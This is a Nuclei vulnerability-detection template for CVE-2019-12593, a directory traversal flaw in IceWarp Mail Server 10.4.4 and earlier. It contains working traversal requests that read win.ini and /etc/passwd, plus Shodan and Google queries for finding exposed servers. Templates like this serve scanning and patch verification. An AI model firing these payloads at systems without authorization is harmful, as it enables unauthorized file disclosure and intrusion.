nuclei-templates/http/cves/2019/CVE-2019-12593.yaml

45 lines
1.4 KiB
YAML

id: CVE-2019-12593
info:
name: IceWarp Mail Server <=10.4.4 - Local File Inclusion
author: pikpikcu
severity: high
description: |
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
reference:
- https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
- http://www.icewarp.com
- https://nvd.nist.gov/vuln/detail/CVE-2019-12593
- http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-12593
cwe-id: CWE-22
epss-score: 0.12314
cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
metadata:
max-request: 2
google-query: Powered By IceWarp 10.4.4
shodan-query: title:"icewarp"
vendor: icewarp
product: mail_server
tags: packetstorm,cve,cve2019,lfi,icewarp
http:
- method: GET
path:
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
matchers-condition: and
matchers:
- type: word
words:
- "[intl]"
- "root:x:0"
- type: status
status:
- 200